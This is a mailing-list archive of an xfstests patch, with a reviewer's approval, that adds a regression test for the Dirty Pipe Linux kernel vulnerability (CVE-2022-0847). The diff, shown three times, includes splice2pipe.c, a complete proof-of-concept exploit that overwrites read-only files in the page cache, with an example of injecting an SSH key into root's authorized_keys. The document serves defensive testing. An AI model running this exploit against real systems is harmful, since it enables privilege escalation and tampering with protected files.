| Message ID | 20220411163710.2157888-3-zlang@redhat.com (mailing list archive) |
|---|---|
| State | New, archived |
| Headers | show |
| Series | xfstests: hexdump and CVE-2022-0847 | expand |
On Tue, Apr 12, 2022 at 12:37:10AM +0800, Zorro Lang wrote: > Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > uninitialized "pipe_buffer.flags" variable. The bug cause a file > can be overwritten even if a user/process is not permitted to write > it. It's fixed by 9d2231c5d74e ("lib/iov_iter: initialize "flags" in > new pipe_buffer"). > > Cc: Max Kellermann <max.kellermann@ionos.com> > Signed-off-by: Zorro Lang <zlang@redhat.com> Still looks ok... Reviewed-by: Darrick J. Wong <djwong@kernel.org> --D > --- > .gitignore | 1 + > src/Makefile | 2 +- > src/splice2pipe.c | 158 ++++++++++++++++++++++++++++++++++++++++++ > tests/generic/999 | 48 +++++++++++++ > tests/generic/999.out | 9 +++ > 5 files changed, 217 insertions(+), 1 deletion(-) > create mode 100644 src/splice2pipe.c > create mode 100755 tests/generic/999 > create mode 100644 tests/generic/999.out > > diff --git a/.gitignore b/.gitignore > index 11405bd2..5f24909e 100644 > --- a/.gitignore > +++ b/.gitignore > @@ -125,6 +125,7 @@ tags > /src/runas > /src/seek_copy_test > /src/seek_sanity_test > +/src/splice2pipe > /src/splice-test > /src/stale_handle > /src/stat_test > diff --git a/src/Makefile b/src/Makefile > index 88877ac9..24aef09b 100644 > --- a/src/Makefile > +++ b/src/Makefile > @@ -31,7 +31,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \ > dio-invalidate-cache stat_test t_encrypted_d_revalidate \ > attr_replace_test swapon mkswap t_attr_corruption t_open_tmpfiles \ > fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \ > - detached_mounts_propagation ext4_resize t_readdir_3 > + detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe > > EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \ > btrfs_crc32c_forged_name.py > diff --git a/src/splice2pipe.c b/src/splice2pipe.c > new file mode 100644 > index 00000000..bd33ff67 > --- /dev/null > +++ b/src/splice2pipe.c > @@ -0,0 +1,158 @@ > +/* SPDX-License-Identifier: GPL-2.0 */ > +/* > + * Copyright 2022 CM4all GmbH / IONOS SE > + * > + * author: Max Kellermann <max.kellermann@ionos.com> > + * > + * Proof-of-concept exploit for the Dirty Pipe > + * vulnerability (CVE-2022-0847) caused by an uninitialized > + * "pipe_buffer.flags" variable. It demonstrates how to overwrite any > + * file contents in the page cache, even if the file is not permitted > + * to be written, immutable or on a read-only mount. > + * > + * This exploit requires Linux 5.8 or later; the code path was made > + * reachable by commit f6dd975583bd ("pipe: merge > + * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was > + * there before, it just provided an easy way to exploit it. > + * > + * There are two major limitations of this exploit: the offset cannot > + * be on a page boundary (it needs to write one byte before the offset > + * to add a reference to this page to the pipe), and the write cannot > + * cross a page boundary. > + * > + * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' > + * > + * Further explanation: https://dirtypipe.cm4all.com/ > + */ > +#ifndef _GNU_SOURCE > +#define _GNU_SOURCE > +#endif > +#include <unistd.h> > +#include <fcntl.h> > +#include <stdio.h> > +#include <stdlib.h> > +#include <string.h> > +#include <sys/stat.h> > +#include <sys/user.h> > + > +/** > + * Create a pipe where all "bufs" on the pipe_inode_info ring have the > + * PIPE_BUF_FLAG_CAN_MERGE flag set. > + */ > +static void prepare_pipe(int p[2]) > +{ > + if (pipe(p)) { > + perror("pipe failed"); > + abort(); > + } > + > + const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); > + static char buffer[4096]; > + > + /* fill the pipe completely; each pipe_buffer will now have > + the PIPE_BUF_FLAG_CAN_MERGE flag */ > + for (unsigned r = pipe_size; r > 0;) { > + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; > + write(p[1], buffer, n); > + r -= n; > + } > + > + /* drain the pipe, freeing all pipe_buffer instances (but > + leaving the flags initialized) */ > + for (unsigned r = pipe_size; r > 0;) { > + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; > + read(p[0], buffer, n); > + r -= n; > + } > + > + /* the pipe is now empty, and if somebody adds a new > + pipe_buffer without initializing its "flags", the buffer > + will be mergeable */ > +} > + > +int main(int argc, char **argv) > +{ > + if (argc != 4) { > + fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); > + return EXIT_FAILURE; > + } > + > + /* dumb command-line argument parser */ > + const char *const path = argv[1]; > + loff_t offset = strtoul(argv[2], NULL, 0); > + const char *const data = argv[3]; > + const size_t data_size = strlen(data); > + int page_size = sysconf(_SC_PAGESIZE); > + if (page_size == -1) > + page_size = 4096; > + > + if (offset % page_size == 0) { > + fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); > + return EXIT_FAILURE; > + } > + > + const loff_t next_page = (offset | (page_size - 1)) + 1; > + const loff_t end_offset = offset + (loff_t)data_size; > + if (end_offset > next_page) { > + fprintf(stderr, "Sorry, cannot write across a page boundary\n"); > + return EXIT_FAILURE; > + } > + > + /* open the input file and validate the specified offset */ > + const int fd = open(path, O_RDONLY); // yes, read-only! :-) > + if (fd < 0) { > + perror("open failed"); > + return EXIT_FAILURE; > + } > + > + struct stat st; > + if (fstat(fd, &st)) { > + perror("stat failed"); > + return EXIT_FAILURE; > + } > + > + if (offset > st.st_size) { > + fprintf(stderr, "Offset is not inside the file\n"); > + return EXIT_FAILURE; > + } > + > + if (end_offset > st.st_size) { > + fprintf(stderr, "Sorry, cannot enlarge the file\n"); > + return EXIT_FAILURE; > + } > + > + /* create the pipe with all flags initialized with > + PIPE_BUF_FLAG_CAN_MERGE */ > + int p[2]; > + prepare_pipe(p); > + > + /* splice one byte from before the specified offset into the > + pipe; this will add a reference to the page cache, but > + since copy_page_to_iter_pipe() does not initialize the > + "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ > + --offset; > + ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); > + if (nbytes < 0) { > + perror("splice failed"); > + return EXIT_FAILURE; > + } > + if (nbytes == 0) { > + fprintf(stderr, "short splice\n"); > + return EXIT_FAILURE; > + } > + > + /* the following write will not create a new pipe_buffer, but > + will instead write into the page cache, because of the > + PIPE_BUF_FLAG_CAN_MERGE flag */ > + nbytes = write(p[1], data, data_size); > + if (nbytes < 0) { > + perror("write failed"); > + return EXIT_FAILURE; > + } > + if ((size_t)nbytes < data_size) { > + fprintf(stderr, "short write\n"); > + return EXIT_FAILURE; > + } > + > + return EXIT_SUCCESS; > +} > diff --git a/tests/generic/999 b/tests/generic/999 > new file mode 100755 > index 00000000..111dde06 > --- /dev/null > +++ b/tests/generic/999 > @@ -0,0 +1,48 @@ > +#! /bin/bash > +# SPDX-License-Identifier: GPL-2.0 > +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. > +# > +# FS QA Test No. 999 > +# > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > +# uninitialized "pipe_buffer.flags" variable, which fixed by: > +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") > +# > +. ./common/preamble > +_begin_fstest auto quick > + > +# real QA test starts here > +_supported_fs generic > +_require_test > +_require_user > +_require_chmod > +_require_test_program "splice2pipe" > + > +localfile=$TEST_DIR/testfile.$seq > +rm -f $localfile > + > +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly > +# permission on it > +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 > +chmod 0644 $localfile > +# Test privileged user (xfstests generally run with root) > +echo "Test privileged user:" > +$here/src/splice2pipe $localfile 1 "AAAAAAAABBBBBBBB" > +# Part of 0xff will be overwritten if there's CVE-2022-0847 bug > +_hexdump $localfile > + > +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly > +# permission on it > +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 > +chmod 0644 $localfile > +# Copy splice2pipe to a place which can be run by an unprivileged user (avoid > +# something likes /root/xfstests/src/splice2pipe) > +cp $here/src/splice2pipe $tmp.splice2pipe > +# Test unprivileged user's privilege escalation > +echo "Test unprivileged user:" > +su ${qa_user} -c "$tmp.splice2pipe $localfile 1 AAAAAAAABBBBBBBB" > +_hexdump $localfile > + > +# success, all done > +status=0 > +exit > diff --git a/tests/generic/999.out b/tests/generic/999.out > new file mode 100644 > index 00000000..a142909b > --- /dev/null > +++ b/tests/generic/999.out > @@ -0,0 +1,9 @@ > +QA output created by 999 > +Test privileged user: > +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< > +* > +001000 > +Test unprivileged user: > +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< > +* > +001000 > -- > 2.31.1 >
diff --git a/.gitignore b/.gitignore index 11405bd2..5f24909e 100644 --- a/.gitignore +++ b/.gitignore @@ -125,6 +125,7 @@ tags /src/runas /src/seek_copy_test /src/seek_sanity_test +/src/splice2pipe /src/splice-test /src/stale_handle /src/stat_test diff --git a/src/Makefile b/src/Makefile index 88877ac9..24aef09b 100644 --- a/src/Makefile +++ b/src/Makefile @@ -31,7 +31,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \ dio-invalidate-cache stat_test t_encrypted_d_revalidate \ attr_replace_test swapon mkswap t_attr_corruption t_open_tmpfiles \ fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \ - detached_mounts_propagation ext4_resize t_readdir_3 + detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \ btrfs_crc32c_forged_name.py diff --git a/src/splice2pipe.c b/src/splice2pipe.c new file mode 100644 index 00000000..bd33ff67 --- /dev/null +++ b/src/splice2pipe.c @@ -0,0 +1,158 @@ +/* SPDX-License-Identifier: GPL-2.0 */ +/* + * Copyright 2022 CM4all GmbH / IONOS SE + * + * author: Max Kellermann <max.kellermann@ionos.com> + * + * Proof-of-concept exploit for the Dirty Pipe + * vulnerability (CVE-2022-0847) caused by an uninitialized + * "pipe_buffer.flags" variable. It demonstrates how to overwrite any + * file contents in the page cache, even if the file is not permitted + * to be written, immutable or on a read-only mount. + * + * This exploit requires Linux 5.8 or later; the code path was made + * reachable by commit f6dd975583bd ("pipe: merge + * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was + * there before, it just provided an easy way to exploit it. + * + * There are two major limitations of this exploit: the offset cannot + * be on a page boundary (it needs to write one byte before the offset + * to add a reference to this page to the pipe), and the write cannot + * cross a page boundary. + * + * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' + * + * Further explanation: https://dirtypipe.cm4all.com/ + */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include <unistd.h> +#include <fcntl.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <sys/user.h> + +/** + * Create a pipe where all "bufs" on the pipe_inode_info ring have the + * PIPE_BUF_FLAG_CAN_MERGE flag set. + */ +static void prepare_pipe(int p[2]) +{ + if (pipe(p)) { + perror("pipe failed"); + abort(); + } + + const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); + static char buffer[4096]; + + /* fill the pipe completely; each pipe_buffer will now have + the PIPE_BUF_FLAG_CAN_MERGE flag */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + write(p[1], buffer, n); + r -= n; + } + + /* drain the pipe, freeing all pipe_buffer instances (but + leaving the flags initialized) */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + read(p[0], buffer, n); + r -= n; + } + + /* the pipe is now empty, and if somebody adds a new + pipe_buffer without initializing its "flags", the buffer + will be mergeable */ +} + +int main(int argc, char **argv) +{ + if (argc != 4) { + fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); + return EXIT_FAILURE; + } + + /* dumb command-line argument parser */ + const char *const path = argv[1]; + loff_t offset = strtoul(argv[2], NULL, 0); + const char *const data = argv[3]; + const size_t data_size = strlen(data); + int page_size = sysconf(_SC_PAGESIZE); + if (page_size == -1) + page_size = 4096; + + if (offset % page_size == 0) { + fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); + return EXIT_FAILURE; + } + + const loff_t next_page = (offset | (page_size - 1)) + 1; + const loff_t end_offset = offset + (loff_t)data_size; + if (end_offset > next_page) { + fprintf(stderr, "Sorry, cannot write across a page boundary\n"); + return EXIT_FAILURE; + } + + /* open the input file and validate the specified offset */ + const int fd = open(path, O_RDONLY); // yes, read-only! :-) + if (fd < 0) { + perror("open failed"); + return EXIT_FAILURE; + } + + struct stat st; + if (fstat(fd, &st)) { + perror("stat failed"); + return EXIT_FAILURE; + } + + if (offset > st.st_size) { + fprintf(stderr, "Offset is not inside the file\n"); + return EXIT_FAILURE; + } + + if (end_offset > st.st_size) { + fprintf(stderr, "Sorry, cannot enlarge the file\n"); + return EXIT_FAILURE; + } + + /* create the pipe with all flags initialized with + PIPE_BUF_FLAG_CAN_MERGE */ + int p[2]; + prepare_pipe(p); + + /* splice one byte from before the specified offset into the + pipe; this will add a reference to the page cache, but + since copy_page_to_iter_pipe() does not initialize the + "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ + --offset; + ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); + if (nbytes < 0) { + perror("splice failed"); + return EXIT_FAILURE; + } + if (nbytes == 0) { + fprintf(stderr, "short splice\n"); + return EXIT_FAILURE; + } + + /* the following write will not create a new pipe_buffer, but + will instead write into the page cache, because of the + PIPE_BUF_FLAG_CAN_MERGE flag */ + nbytes = write(p[1], data, data_size); + if (nbytes < 0) { + perror("write failed"); + return EXIT_FAILURE; + } + if ((size_t)nbytes < data_size) { + fprintf(stderr, "short write\n"); + return EXIT_FAILURE; + } + + return EXIT_SUCCESS; +} diff --git a/tests/generic/999 b/tests/generic/999 new file mode 100755 index 00000000..111dde06 --- /dev/null +++ b/tests/generic/999 @@ -0,0 +1,48 @@ +#! /bin/bash +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. +# +# FS QA Test No. 999 +# +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an +# uninitialized "pipe_buffer.flags" variable, which fixed by: +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") +# +. ./common/preamble +_begin_fstest auto quick + +# real QA test starts here +_supported_fs generic +_require_test +_require_user +_require_chmod +_require_test_program "splice2pipe" + +localfile=$TEST_DIR/testfile.$seq +rm -f $localfile + +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly +# permission on it +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 +chmod 0644 $localfile +# Test privileged user (xfstests generally run with root) +echo "Test privileged user:" +$here/src/splice2pipe $localfile 1 "AAAAAAAABBBBBBBB" +# Part of 0xff will be overwritten if there's CVE-2022-0847 bug +_hexdump $localfile + +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly +# permission on it +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 +chmod 0644 $localfile +# Copy splice2pipe to a place which can be run by an unprivileged user (avoid +# something likes /root/xfstests/src/splice2pipe) +cp $here/src/splice2pipe $tmp.splice2pipe +# Test unprivileged user's privilege escalation +echo "Test unprivileged user:" +su ${qa_user} -c "$tmp.splice2pipe $localfile 1 AAAAAAAABBBBBBBB" +_hexdump $localfile + +# success, all done +status=0 +exit diff --git a/tests/generic/999.out b/tests/generic/999.out new file mode 100644 index 00000000..a142909b --- /dev/null +++ b/tests/generic/999.out @@ -0,0 +1,9 @@ +QA output created by 999 +Test privileged user: +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< +* +001000 +Test unprivileged user: +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< +* +001000
Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an uninitialized "pipe_buffer.flags" variable. The bug cause a file can be overwritten even if a user/process is not permitted to write it. It's fixed by 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer"). Cc: Max Kellermann <max.kellermann@ionos.com> Signed-off-by: Zorro Lang <zlang@redhat.com> --- .gitignore | 1 + src/Makefile | 2 +- src/splice2pipe.c | 158 ++++++++++++++++++++++++++++++++++++++++++ tests/generic/999 | 48 +++++++++++++ tests/generic/999.out | 9 +++ 5 files changed, 217 insertions(+), 1 deletion(-) create mode 100644 src/splice2pipe.c create mode 100755 tests/generic/999 create mode 100644 tests/generic/999.out